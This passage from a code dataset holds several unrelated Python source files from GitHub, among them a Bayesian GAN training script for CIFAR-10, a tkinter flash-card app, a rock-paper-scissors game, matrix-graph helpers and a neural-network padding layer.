print(\"Falling or the same\")\n\n if v:\n print(\"Optimal number of iterations:\", opt_iterations)\n print(\"Best accuracy:\", val_acc)\n print(\"Accuracy at stop:\", val_acc_new)\n\n if eval:\n plt.figure(figsize=(13, 8))\n plt.plot(testcosts)\n plt.title('Test Cost Graph', fontsize=24)\n plt.xlabel('Iterations', fontsize=20)\n plt.ylabel('Test Cost', fontsize=20)\n plt.show()\n\n return self.best_agent, self.opt_agent\n\n\n\n\n\n\n","repo_name":"FaxMan1/Master-Thesis","sub_path":"DE_Pytorch.py","file_name":"DE_Pytorch.py","file_ext":"py","file_size_in_byte":8792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"31947234242","text":"import sys\n\nresult = {}\nif __name__ == '__main__':\n for ln in sys.stdin:\n try:\n split = ln.split()\n od = split[0]\n for idx, val in enumerate(split[3].split(\";\")):\n if val.split(\":\")[2] == \"1\":\n key = od + \"_\" + val.split(\"|\")[0]\n if not result.has_key(key):\n result[key] = set([])\n result[key].add(split[1])\n except Exception as e:\n print(\"error:\", e)\n\n for key, val in result.iteritems():\n f = open(\"xunfei\" + key, \"a\")\n for m in val:\n f.write(m + \"\\n\")\n f.close()\n","repo_name":"chenfangzhi123/pyDemo","sub_path":"count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25913055736","text":"# common matrix functions for 081, 082 and 083\nfrom dijkstra import Node\n\ndef load_matrix_from_file(filename):\n matrix = []\n f = open(filename, \"r\")\n for line in f:\n matrix.append([int(x) for x in line.strip().split(\",\")]) \n f.close()\n return matrix\n\ndef node_at(nd,x,y,value):\n key = \"{},{}\".format(x,y)\n if key in nd:\n return nd[key]\n node = Node(value)\n nd[key] = node\n return node\n\ndef convert_matrix_to_graph(m,\n include_right=False,include_left=False,include_down=False,include_up=False):\n nd = {} # node dictionary, key = \"1,5\" index in matrix\n all_nodes = []\n for x,row in enumerate(m):\n for y,value in enumerate(row):\n curr = node_at(nd, x, y, value)\n all_nodes.append(curr)\n if include_right and y < len(row)-1:\n right = node_at(nd, x, y+1, m[x][y+1])\n curr.add_neighbor(right)\n if include_left and y > 0:\n left = node_at(nd, x, y-1, m[x][y-1])\n curr.add_neighbor(left)\n if include_down and x < len(m)-1:\n down = node_at(nd, x+1, y, m[x+1][y])\n curr.add_neighbor(down)\n if include_up and x > 0:\n up = node_at(nd, x-1, y, m[x-1][y])\n curr.add_neighbor(up)\n return all_nodes\n","repo_name":"MrDeshaies/NOT-projecteuler.net","sub_path":"euler_081_083_matrix.py","file_name":"euler_081_083_matrix.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38063729425","text":"# # Training\n# \n# We show that Bayesian GAN can capture the data distribution by measuring its performance in the semi-supervised setting. We will perform the posterior update as outline in Algorithm 1 in Saatchi (2017). This algorithm can be implemented quite simply by adding noise to standard optimizers such as SGD with momentum and keep track of the parameters we sample from the posterior. \n\n# \n\n# ### SGHMC by Optimizing a Noisy Loss\n# \n# First, observe that the update rules are similar to momentum SGD except for the noise $\\boldsymbol{n}$. In fact, without $\\boldsymbol{n}$, this is equivalent to performing momentum SGD with the loss is $- \\sum_{i=1}{J_g} \\sum_{k=1}^{J_d} \\log \\text{posterior} $. We will describe the case where $J_g = J_d=1$ for simplicity. \n# \n# We use the main loss $\\mathcal{L} = - \\log p(\\theta | ..)$ and add a noise loss $\\mathcal{L}_\\text{noise} = \\frac{1}{\\eta} \\theta \\cdot \\boldsymbol{n}$ where $\\boldsymbol{n} \\sim \\mathcal{N}(0, 2 \\alpha \\eta I)$ so that optimizing the loss function $\\mathcal{L} + \\mathcal{L}_\\text{noise}$ with momentum SGD is equivalent to performing the SGHMC update step. \n# \n# Below (Equation 3 and 4) are the posterior probabilities where each error term corresponds its negative log probability.\n\n# \n\n#from __future__ import print_function\nimport os, pickle\nimport numpy as np\nimport random, math\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nfrom statsutil import AverageMeter, accuracy\nfrom tensorboard_logger import configure, log_value\n\n# Default Parameters\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset', default='cifar10')\nparser.add_argument('--imageSize', type=int, default=32)\nparser.add_argument('--batchSize', type=int, default=64, help='input batch size')\nparser.add_argument('--nz', type=int, default=100, help='size of the latent z vector')\nparser.add_argument('--niter', type=int, default=2, help='number of epochs to train for')\nparser.add_argument('--lr', type=float, default=0.0002, help='learning rate, default=0.0002')\nparser.add_argument('--cuda', type=int, default=1, help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')\nparser.add_argument('--outf', default='modelfiles/pytorch_demo3', help='folder to output images and model checkpoints')\nparser.add_argument('--numz', type=int, default=1, help='The number of set of z to marginalize over.')\nparser.add_argument('--num_mcmc', type=int, default=10, help='The number of MCMC chains to run in parallel')\nparser.add_argument('--num_semi', type=int, default=4000, help='The number of semi-supervised samples')\nparser.add_argument('--gnoise_alpha', type=float, default=0.0001, help='')\nparser.add_argument('--dnoise_alpha', type=float, default=0.0001, help='')\nparser.add_argument('--d_optim', type=str, default='adam', choices=['adam', 'sgd'], help='')\nparser.add_argument('--g_optim', type=str, default='adam', choices=['adam', 'sgd'], help='')\nparser.add_argument('--stats_interval', type=int, default=10, help='Calculate test accuracy every interval')\nparser.add_argument('--tensorboard', type=int, default=1, help='')\nparser.add_argument('--bayes', type=int, default=1, help='Do Bayesian GAN or normal GAN')\nimport sys; sys.argv=['']; del sys\nopt = parser.parse_args()\ntry:\n os.makedirs(opt.outf)\nexcept OSError:\n print(\"Error Making Directory\", opt.outf)\n pass\nif opt.tensorboard: configure(opt.outf)\n\n# First, we construct the data loader for full training set \n# as well as the data loader of a partial training set for semi-supervised learning\n# transformation operator\nnormalize = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\ntransform_opt = transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n# get training set and test set\ndataset = dset.CIFAR10(root=\"./cifar10\", download=True,\n transform=transform_opt) \ndataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.batchSize,\n shuffle=True, num_workers=0)\n\nfrom partial_dataset import PartialDataset\n# partial dataset for semi-supervised training\ndataset_partial = PartialDataset(dataset, opt.num_semi)\n\n\n# test set for evaluation\ndataset_test = dset.CIFAR10(root=\"./cifar10\",\n train=False,\n transform=transform_opt)\ndataloader_test = torch.utils.data.DataLoader(dataset_test,\n batch_size=opt.batchSize, shuffle=False, pin_memory=True, num_workers=0)\n\ndataloader_semi = torch.utils.data.DataLoader(dataset_partial, batch_size=opt.batchSize,\n shuffle=True, num_workers=0)\n\n\n# Now we initialize the distributions of G and D\n##### Generator ######\n# opt.num_mcmc is the number of MCMC chains that we run in parallel\n# opt.numz is the number of noise batches that we use. We also use different parameter samples for different batches\n# we construct opt.numz * opt.num_mcmc initial generator parameters\n# We will keep sampling parameters from the posterior starting from this set\n# Keeping track of many MCMC chains can be done quite elegantly in Pytorch\nfrom utils.BayesianCGANModels.discriminators import _BayesianLeNetD, _netD\nfrom utils.BayesianCGANModels.generators import _BayesianNetG #_netG\nfrom statsutil import weights_init\nnetGs = []\nfor _idxz in range(opt.numz):\n for _idxm in range(opt.num_mcmc):\n netG = _BayesianNetG(noize=opt.nz)\n #netG.apply(weights_init)\n netGs.append(netG)\n \n##### Discriminator ######\n# We will use 1 chain of MCMCs for the discriminator\n# The number of classes for semi-supervised case is 11; that is,\n# index 0 for fake data and 1-10 for the 10 classes of CIFAR.\nnum_classes = 11\nnetD = _netD(opt.ngpu, num_classes=num_classes)\n#netD = _BayesianLeNetD(1,3)\n\n# In order to calculate errG or errD_real, we need to sum the probabilities over all the classes (1 to K)\n# ComplementCrossEntropyLoss is a loss function that performs this task\n# We can specify a default except_index that corresponds to a fake label. In this case, we use index=0\nfrom ComplementCrossEntropyLoss import ComplementCrossEntropyLoss\ncriterion = nn.CrossEntropyLoss()\n# use the default index = 0 - equivalent to summing all other probabilities\ncriterion_comp = ComplementCrossEntropyLoss(except_index=0)\n\n\nfrom utils.BayesianCGANModels.distributions import Normal\nfrom utils.BayesianCGANModels.bayes import NoiseLoss, PriorLoss\n# Finally, initialize the ``optimizers''\n# Since we keep track of a set of parameters, we also need a set of\n# ``optimizers''\nif opt.d_optim == 'adam':\n optimizerD = optim.Adam(netD.parameters(), lr=opt.lr, betas=(0.5, 0.999))\nelif opt.d_optim == 'sgd':\n optimizerD = torch.optim.SGD(netD.parameters(), lr=opt.lr,\n momentum=0.9,\n nesterov=True,\n weight_decay=1e-4)\noptimizerGs = []\nfor netG in netGs:\n optimizerG = optim.Adam(netG.parameters(), lr=opt.lr, betas=(0.5, 0.999))\n optimizerGs.append(optimizerG)\n\n# since the log posterior is the average per sample, we also scale down the prior and the noise\ngprior_criterion = PriorLoss(prior_std=1., observed=1000.)\ngnoise_criterion = NoiseLoss(params=netGs[0].parameters(), scale=math.sqrt(2*opt.gnoise_alpha/opt.lr), observed=1000.)\ndprior_criterion = PriorLoss(prior_std=1., observed=50000.)\ndnoise_criterion = NoiseLoss(params=netD.parameters(), scale=math.sqrt(2*opt.dnoise_alpha*opt.lr), observed=50000.)\n\n\n# Fixed noise for data generation\nfixed_noise = torch.FloatTensor(opt.batchSize, opt.nz, 1, 1).normal_(0, 1).cuda()\nfixed_noise = Variable(fixed_noise)\n\n# initialize input variables and use CUDA (optional)\ninput = torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)\nnoise = torch.FloatTensor(opt.batchSize, opt.nz, 1, 1)\nlabel = torch.FloatTensor(opt.batchSize)\nreal_label = 1\nfake_label = 0\n\nif opt.cuda:\n netD.cuda()\n for netG in netGs:\n netG.cuda()\n criterion.cuda()\n criterion_comp.cuda()\n input, label = input.cuda(), label.cuda()\n noise = noise.cuda()\n\n\n# fully supervised\n#netD_fullsup = _BayesianLeNetD(1,3)\nnetD_fullsup = _netD(opt.ngpu, num_classes=num_classes)\nnetD_fullsup.apply(weights_init) #was not commented out\ncriterion_fullsup = nn.CrossEntropyLoss()\nif opt.d_optim == 'adam':\n optimizerD_fullsup = optim.Adam(netD_fullsup.parameters(), lr=opt.lr, betas=(0.5, 0.999))\nelse:\n optimizerD_fullsup = optim.SGD(netD_fullsup.parameters(), lr=opt.lr,\n momentum=0.9,\n nesterov=True,\n weight_decay=1e-4)\nif opt.cuda:\n netD_fullsup.cuda()\n criterion_fullsup.cuda()\n\n\n# We define a class to calculate the accuracy on test set\n# to test the performance of semi-supervised training\ndef get_test_accuracy(model_d, iteration, label='semi'):\n # don't forget to do model_d.eval() before doing evaluation\n top1 = AverageMeter()\n for i, (input, target) in enumerate(dataloader_test):\n target = target.cuda()\n input = input.cuda()\n input_var = torch.autograd.Variable(input.cuda(), volatile=True)\n target_var = torch.autograd.Variable(target, volatile=True)\n output = model_d(input_var)\n\n probs = output.data[:, 1:] # discard the zeroth index\n prec1 = accuracy(probs, target, topk=(1,))[0]\n #top1.update(prec1[0], input.size(0))\n top1.update(prec1, input.size(0))\n if i % 50 == 0:\n print(\"{} Test: [{}/{}]\\t Prec@1 {top1.val:.3f} ({top1.avg:.3f})\".format(label, i, len(dataloader_test), top1=top1))\n print('{label} Test Prec@1 {top1.avg:.2f}'.format(label=label, top1=top1))\n log_value('test_acc_{}'.format(label), top1.avg, iteration)\n\n\niteration = 0\nfor epoch in range(opt.niter):\n top1 = AverageMeter()\n top1_weakD = AverageMeter()\n for i, data in enumerate(dataloader):\n iteration += 1\n #######\n # 1. real input\n netD.zero_grad()\n _input, _ = data\n batch_size = _input.size(0)\n if opt.cuda:\n _input = _input.cuda()\n input.resize_as_(_input).copy_(_input) \n label.resize_(batch_size).fill_(real_label) \n inputv = Variable(input)\n labelv = Variable(label)\n \n output = netD(inputv)#used to have no [0] index\n print(output.shape)\n errD_real = criterion_comp(output)\n errD_real.backward()\n # calculate D_x, the probability that real data are classified \n D_x = 1 - torch.nn.functional.softmax(output).data[:, 0].mean()\n \n #######\n # 2. Generated input\n fakes = []\n for _idxz in range(opt.numz):\n noise.resize_(batch_size, opt.nz, 1, 1).normal_(0, 1)\n noisev = Variable(noise)\n for _idxm in range(opt.num_mcmc):\n idx = _idxz*opt.num_mcmc + _idxm\n netG = netGs[idx]\n _fake = netG(noisev)[0]\n fakes.append(_fake)\n fake = torch.cat(fakes)\n output = netD(fake.detach())#used to have no [0] index\n labelv = Variable(torch.LongTensor(fake.data.shape[0]).cuda().fill_(fake_label))\n errD_fake = criterion(output, labelv)\n errD_fake.backward()\n \n D_G_z1 = 1 - torch.nn.functional.softmax(output).data[:, 0].mean()\n \n #######\n # 3. Labeled Data Part (for semi-supervised learning)\n for ii, (input_sup, target_sup) in enumerate(dataloader_semi):\n input_sup, target_sup = input_sup.cuda(), target_sup.cuda()\n break\n input_sup_v = Variable(input_sup.cuda())\n # convert target indicies from 0 to 9 to 1 to 10\n target_sup_v = Variable( (target_sup + 1).cuda())\n output_sup = netD(input_sup_v) #used to have no [0] index\n err_sup = criterion(output_sup, target_sup_v)\n err_sup.backward()\n prec1 = accuracy(output_sup.data, target_sup + 1, topk=(1,))[0]\n #top1.update(prec1[0], input_sup.size(0))\n top1.update(prec1,input_sup.size(0))\n if opt.bayes:\n errD_prior = dprior_criterion(netD.parameters())\n errD_prior.backward()\n errD_noise = dnoise_criterion(netD.parameters())\n errD_noise.backward()\n errD = errD_real + errD_fake + err_sup + errD_prior + errD_noise\n else:\n errD = errD_real + errD_fake + err_sup\n optimizerD.step()\n \n # 4. Generator\n for netG in netGs:\n netG.zero_grad()\n labelv = Variable(torch.FloatTensor(fake.data.shape[0]).cuda().fill_(real_label))\n output = netD(fake)\n errG = criterion_comp(output)\n if opt.bayes:\n for netG in netGs:\n errG += gprior_criterion(netG.parameters())\n errG += gnoise_criterion(netG.parameters())\n errG.backward()\n D_G_z2 = 1 - torch.nn.functional.softmax(output).data[:, 0].mean()\n for optimizerG in optimizerGs:\n optimizerG.step()\n \n # 5. Fully supervised training (running in parallel for comparison)\n netD_fullsup.zero_grad()\n input_fullsup = Variable(input_sup)\n target_fullsup = Variable((target_sup + 1))\n output_fullsup = netD_fullsup(input_fullsup)#used to have no [0] index\n err_fullsup = criterion_fullsup(output_fullsup, target_fullsup)\n optimizerD_fullsup.zero_grad()\n err_fullsup.backward()\n optimizerD_fullsup.step()\n \n # 6. get test accuracy after every interval\n if iteration % opt.stats_interval == 0:\n # get test accuracy on train and test\n netD.eval()\n get_test_accuracy(netD, iteration, label='semi')\n get_test_accuracy(netD_fullsup, iteration, label='sup')\n netD.train()\n \n # 7. Report for this iteration\n cur_val, ave_val = top1.val, top1.avg\n log_value('train_acc', top1.avg, iteration)\n #print('[%d/%d][%d/%d] Loss_D: %.2f Loss_G: %.2f D(x): %.2f D(G(z)): %.2f / %.2f | Acc %.1f / %.1f' % (epoch, opt.niter, i, len(dataloader),errD.data[0], errG.data[0], D_x, D_G_z1, D_G_z2, cur_val, ave_val))\n print('[%d/%d][%d/%d] Loss_D: %.2f Loss_G: %.2f D(x): %.2f D(G(z)): %.2f / %.2f | Acc %.1f / %.1f'\n % (epoch, opt.niter, i, len(dataloader),\n errD.data, errG.data, D_x, D_G_z1, D_G_z2, cur_val, ave_val))\n # after each epoch, save images\n vutils.save_image(_input,\n '%s/real_samples.png' % opt.outf,\n normalize=True)\n for _zid in range(opt.numz):\n for _mid in range(opt.num_mcmc):\n idx = _zid*opt.num_mcmc + _mid\n netG = netGs[idx]\n fake = netG(fixed_noise)[0]\n vutils.save_image(fake.data,\n '%s/fake_samples_epoch_%03d_G_z%02d_m%02d.png' % (opt.outf, epoch, _zid, _mid),\n normalize=True)\n for ii, netG in enumerate(netGs):\n torch.save(netG.state_dict(), '%s/netG%d_epoch_%d.pth' % (opt.outf, ii, epoch))\n torch.save(netD.state_dict(), '%s/netD_epoch_%d.pth' % (opt.outf, epoch))\n torch.save(netD_fullsup.state_dict(), '%s/netD_fullsup_epoch_%d.pth' % (opt.outf, epoch))\n\n\n#from tensorflow.python.summary import event_accumulator\nfrom tensorboard.backend.event_processing import event_accumulator\nimport pandas as pd\nfrom plotnine import *\nea = event_accumulator.EventAccumulator(opt.outf)\nea.Reload()\n\n_df1 = pd.DataFrame(ea.Scalars('test_acc_semi'))\n_df2 = pd.DataFrame(ea.Scalars('test_acc_sup'))\ndf = pd.DataFrame()\ndf['Iteration'] = pd.concat([_df1['step'], _df2['step']])\ndf['Accuracy'] = pd.concat([_df1['value'], _df2['value']])\ndf['Classification'] = ['BayesGAN']*len(_df1['step']) + ['Baseline']*len(_df2['step'])\n\n\n# The results show that the Bayesian discriminator trained with the Bayesian generator outperforms the discriminator trained on partial data.\n\n\np = ggplot(df, aes(x='Iteration', y='Accuracy', color='Classification', label='Classification')) + geom_point(size=0.5)\nprint(p)\n","repo_name":"gumin2020/MyDissertation","sub_path":"Convolutional_BayesianGAN/Bayesian GAN in PyTorch.py","file_name":"Bayesian GAN in PyTorch.py","file_ext":"py","file_size_in_byte":16531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35776645612","text":"from tkinter import *\nimport pandas as pd\nfrom random import choice\n\nBACKGROUND_COLOR = \"#B1DDC6\"\ncurrent_word = {}\ndata_dict = {}\n\ntry:\n data = pd.read_csv('Files/words_to_learn.csv')\nexcept FileNotFoundError:\n original_data = pd.read_csv('Files/french_words.csv')\n data_dict = original_data.to_dict(orient=\"records\")\nelse:\n data_dict = data.to_dict(orient=\"records\")\n\n\ndef change_word():\n global current_word, flip_timer\n window.after_cancel(flip_timer)\n current_word = choice(data_dict)\n canvas.itemconfig(lang, text=\"French\", fill=\"black\")\n canvas.itemconfig(word, text=f\"{current_word['French']}\", fill=\"black\")\n canvas.itemconfig(canvas_image, image=card_front_image)\n flip_timer = window.after(3000, func=flip_card)\n\n\ndef flip_card():\n canvas.itemconfig(lang, text=\"English\", fill=\"white\")\n canvas.itemconfig(word, text=f\"{current_word['English']}\", fill=\"white\")\n canvas.itemconfig(canvas_image, image=card_back_image)\n\n\ndef known_words():\n data_dict.remove(current_word)\n new_data = pd.DataFrame(data_dict)\n new_data.to_csv(\"Files/words_to_learn.csv\", index=False)\n\n change_word()\n\n\nwindow = Tk()\nwindow.title(\"Flash Card App\")\nwindow.config(padx=50, pady=50, bg=BACKGROUND_COLOR)\n\nwindow.tk.call('source', 'Files/azure.tcl')\nwindow.tk.call('set_theme', 'light')\n\nflip_timer = window.after(3000, func=flip_card)\n\ncanvas = Canvas(width=800, height=530, highlightthickness=0, bg=BACKGROUND_COLOR)\ncard_front_image = PhotoImage(file='Files/card_front.png')\ncard_back_image = PhotoImage(file='Files/card_back.png')\nright_image = PhotoImage(file='Files/right.png')\nwrong_image = PhotoImage(file='Files/wrong.png')\ncanvas_image = canvas.create_image(400, 263, image=card_front_image)\nlang = canvas.create_text(400, 200, text=\"\", font=(\"Poppins\", 25))\nword = canvas.create_text(400, 300, text=\"\", font=(\"Poppins\", 76, \"bold\"))\ncanvas.grid(row=1, column=1, columnspan=3)\n\nright_btn = Button(image=right_image, border=0, bg=BACKGROUND_COLOR, cursor='hand2',\n command=known_words, activebackground=BACKGROUND_COLOR)\nright_btn.grid(row=2, column=3)\n\nwrong_btn = Button(image=wrong_image, bg=BACKGROUND_COLOR, border=0, cursor='hand2',\n command=change_word, activebackground=BACKGROUND_COLOR)\nwrong_btn.grid(row=2, column=1)\n\nchange_word()\n\nwindow.mainloop()\n","repo_name":"Maliksidk19/100DaysOfPython","sub_path":"Day31_flashCardApp.py","file_name":"Day31_flashCardApp.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25103747720","text":"\"\"\"Implements the padding layer.\"\"\"\nimport typing\n\nfrom decaf.base import Layer, Blob\n\n\nclass PaddingLayer(Layer):\n \"\"\"A Layer that pads a matrix.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a padding layer.\n kwargs:\n 'pad': the number of pixels to pad, Should be non-negative. If pad is 0, the layer will simply mirror the\n input.\n 'value': the value inserted to the padded area. Default 0.\n \"\"\"\n Layer.__init__(self, **kwargs)\n self._pad: int = self.spec['pad']\n self._value: float = self.spec.get('value', 0)\n if self._pad < 0:\n raise ValueError('Padding should be non-negative.')\n\n def forward(self,\n bottom: typing.List[Blob],\n top: typing.List[Blob]):\n \"\"\"Computes the forward pass.\"\"\"\n if self._pad == 0:\n top[0].mirror(bottom[0].data())\n return\n features = bottom[0].data()\n pad = self._pad\n new_shape = (features.shape[0],\n features.shape[1] + pad * 2,\n features.shape[2] + pad * 2) + features.shape[3:]\n output = top[0].init_data(new_shape, features.dtype)\n output[:] = self._value\n output[:, pad:-pad, pad:-pad] = features\n\n def backward(self,\n bottom: typing.List[Blob],\n top: typing.List[Blob],\n propagate_down: bool):\n \"\"\"Computes the backward pass.\"\"\"\n if not propagate_down:\n return 0.\n if self._pad == 0:\n bottom[0].mirror_diff(top[0].diff())\n else:\n pad = self._pad\n top_diff = top[0].diff()\n bottom_diff = bottom[0].init_diff()\n bottom_diff[:] = top_diff[:, pad:-pad, pad:-pad]\n return 0.\n\n def update(self):\n \"\"\"Padding has nothing to update.\"\"\"\n pass\n","repo_name":"xinpingwang/decaf","sub_path":"decaf/layers/padding.py","file_name":"padding.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"526280271","text":"import click\nfrom rapyuta_io import Build\n\nfrom riocli.build.util import name_to_guid\nfrom riocli.config import new_client\nfrom riocli.utils import inspect_with_format\n\n\n@click.command('inspect')\n@click.option('--format', '-f', 'format_type', default='yaml',\n type=click.Choice(['json', 'yaml'], case_sensitive=False))\n@click.argument('build-name', required=True)\n@name_to_guid\ndef inspect_build(format_type: str, build_guid: str, build_name: str) -> None:\n \"\"\"\n Inspect the build resource\n \"\"\"\n try:\n client = new_client()\n build = client.get_build(build_guid, include_build_requests=True)\n data = make_build_inspectable(build)\n inspect_with_format(data, format_type)\n except Exception as e:\n click.secho(str(e), fg='red')\n raise SystemExit(1)\n\n\ndef make_build_inspectable(build: Build) -> dict:\n build_requests = make_build_requests_inspectable(build)\n build_info = make_build_info_inspectable(build)\n return {\n 'created_at': build.CreatedAt,\n 'updated_at': build.UpdatedAt,\n 'deleted_at': build.DeletedAt,\n 'guid': build.guid,\n 'build_generation': build.buildGeneration,\n 'build_name': build.buildName,\n 'build_info': build_info,\n 'status': build.status,\n 'owner_project': build.ownerProject,\n 'creator': build.creator,\n 'docker_pull_info': build.dockerPullInfo,\n 'build_requests': build_requests,\n 'secret': build.secret,\n 'docker_pull_secret': build.dockerPullSecret,\n 'docker_push_secret': build.dockerPushSecret,\n 'docker_push_repository': build.dockerPushRepository,\n }\n\n\ndef make_build_info_inspectable(build: Build) -> dict:\n build_info = build.buildInfo\n return {\n 'repository': build_info.repository,\n 'strategy_type': build_info.strategyType,\n 'architecture': build_info.architecture,\n 'is_ros': build_info.isRos,\n 'ros_distro': build_info.rosDistro,\n 'simulation_options': {\n 'simulation': build_info.simulationOptions.simulation\n },\n 'build_options': build_info.buildOptions,\n 'branch': build_info.branch,\n 'docker_file_path': build_info.dockerFilePath,\n 'context_dir': build_info.contextDir,\n }\n\n\ndef make_build_requests_inspectable(build: Build) -> list:\n build_request_data = []\n for build_request in build.buildRequests:\n build_request_data.append({\n 'created_at': build_request['CreatedAt'],\n 'updated_at': build_request['UpdatedAt'],\n 'deleted_at': build_request['DeletedAt'],\n 'request_id': build_request['requestId'],\n 'is_complete': build_request['isComplete'],\n 'error_string': build_request['errorString'],\n 'owner_project': build_request['ownerProject'],\n 'creator': build_request['creator'],\n 'trigger_name': build_request['triggerName'],\n 'build_generation': build_request['buildGeneration'],\n 'git_metadata': make_git_metadata_inspectable(build_request['gitMetadata']),\n 'executable_image_info': make_executable_image_info_inspectable(build_request['executableImageInfo']),\n })\n return build_request_data\n\n\ndef make_git_metadata_inspectable(git_metadata: dict) -> dict:\n guid = list(git_metadata.keys())[0]\n guid_details = git_metadata[guid]\n guid_value = {\n 'author': {\n 'email': guid_details['author']['email'],\n 'name': guid_details['author']['name'],\n },\n 'branch': guid_details['branch'],\n 'commit': guid_details['commit'],\n 'committer': {\n 'email': guid_details['committer']['email'],\n 'name': guid_details['committer']['name'],\n },\n 'message': guid_details['message'],\n 'repository_url': guid_details['repositoryUrl']\n }\n return {\n guid: guid_value\n }\n\n\ndef make_executable_image_info_inspectable(exec_img_info: dict) -> dict:\n image_info_list = []\n for img_info in exec_img_info['imageInfo']:\n image_info_list.append({\n 'artifact_id': img_info['artifactID'],\n 'image_name': img_info['imageName'],\n })\n return {\n 'image_info': image_info_list\n }\n","repo_name":"rapyuta-robotics/rapyuta-io-cli","sub_path":"riocli/build/inspect.py","file_name":"inspect.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"36349618389","text":"import random\nimport tkinter as tk\nfrom tkinter import ttk # themed widgets\n\nWIDTH, HEIGHT = 490, 300\nBUTTON_WIDTH, BUTTON_HEIGHT = 22, 6\n\nroot = tk.Tk()\nroot.resizable(False, False)\nroot.geometry(f'{WIDTH}x{HEIGHT}')\nroot.title('rock_paper_scissors')\n\n\ndef play(choice):\n opponent = random.choice(['rock', 'paper', 'scissors'])\n opponentChoice['text'] = f'{opponent}'\n yourChoice['text'] = f'{choice}'\n if ((choice == 'rock' and opponent == 'scissors') or\n (choice == 'paper' and opponent == 'rock') or\n (choice == 'scissors' and opponent == 'paper')):\n winning['text'] = \"You Won\"\n\n t_splitted = statisticsValue['text'].split('/')\n statisticsValue['text'] = f'{int(t_splitted[0])+1}/{t_splitted[1]}/{t_splitted[2]}'\n elif choice == opponent:\n winning['text'] = \"Draw\"\n t_splitted = statisticsValue['text'].split('/')\n statisticsValue['text'] = f'{t_splitted[0]}/{t_splitted[1]}/{int(t_splitted[2])+1}'\n else:\n winning['text'] = \"You Lost\"\n t_splitted = statisticsValue['text'].split('/')\n statisticsValue['text'] = f'{t_splitted[0]}/{int(t_splitted[1])+1}/{t_splitted[2]}'\n\n\nframeUpper = tk.Frame(root)\n\nrock = tk.Button(frameUpper, text=\"rock\", width=BUTTON_WIDTH, height=BUTTON_HEIGHT, command=lambda: play('rock'))\nrock.grid(row=1, column=0)\n\npaper = tk.Button(frameUpper, text=\"paper\", width=BUTTON_WIDTH, height=BUTTON_HEIGHT, command=lambda: play('paper'))\npaper.grid(row=1, column=1)\n\nscissors = tk.Button(frameUpper, text=\"scissors\", width=BUTTON_WIDTH, height=BUTTON_HEIGHT,\n command=lambda: play('scissors'))\nscissors.grid(row=1, column=2)\n\n\nwinning = ttk.Label(root, text=\"Press button to play...\", font='Times 20 bold')\nwinning.grid(row=2)\n\nyourChoiceLabel = ttk.Label(root, text=\"Your Choice:\", font='Times 18')\nyourChoiceLabel.grid(row=3, column=0, sticky=tk.W)\n\nyourChoice = ttk.Label(root, text=\"\", font='Times 20 italic')\nyourChoice.grid(row=3, column=0)\n\nopponentChoice = ttk.Label(root, text=\"Opponent Choice:\", font='Times 18')\nopponentChoice.grid(row=4, column=0, sticky=tk.W)\n\nopponentChoice = ttk.Label(root, text=\"\", font='Times 20 italic')\nopponentChoice.grid(row=4, column=0)\n\nstatistics = ttk.Label(root, text=\"Statistics(W,L,D):\", font='Times 16')\nstatistics.grid(row=5, column=0, sticky=tk.W)\n\nstatisticsValue = ttk.Label(root, text=\"0/0/0\", font='Times 18')\nstatisticsValue.grid(row=5, column=0)\n\nframeUpper.grid(row=1)\nroot.mainloop()\n","repo_name":"noxikoxi/zadaniaPython","sub_path":"zestaw10/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"26549706284","text":"\nfrom pyglet.gl import *\nfrom pyglet.window import mouse\nfrom src.window import Window\nfrom src.cube import *\nfrom config import *\n\ndef setup():\n\n # Set the color of \"clear\", i.e. the sky, in rgba.\n glClearColor(BG_COLOR[0], BG_COLOR[1], BG_COLOR[2],BG_COLOR[3])\n\n # Enable culling (not rendering) of back-facing facets -- facets that aren't\n # visible to you.\n # glEnable( GL_CULL_FACE )\n # Set the texture minification/magnification function to GL_NEAREST (nearest\n # in Manhattan distance) to the specified texture coordinates. GL_NEAREST\n # \"is generally faster than GL_LINEAR, but it can produce textured images\n # with sharper edges because the transition between texture elements is not\n\n # as smooth.\"\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n\n glEnable(GL_FOG)\n # Set the fog color.\n glFogfv(GL_FOG_COLOR, (GLfloat * 4)(BG_COLOR[0], BG_COLOR[1], BG_COLOR[2],BG_COLOR[3]))\n # Say we have no preference between rendering speed and quality.\n glHint(GL_FOG_HINT, GL_DONT_CARE)\n # Specify the equation used to compute the blending factor.\n glFogi(GL_FOG_MODE, GL_LINEAR)\n # How close and far away fog starts and ends. The closer the start 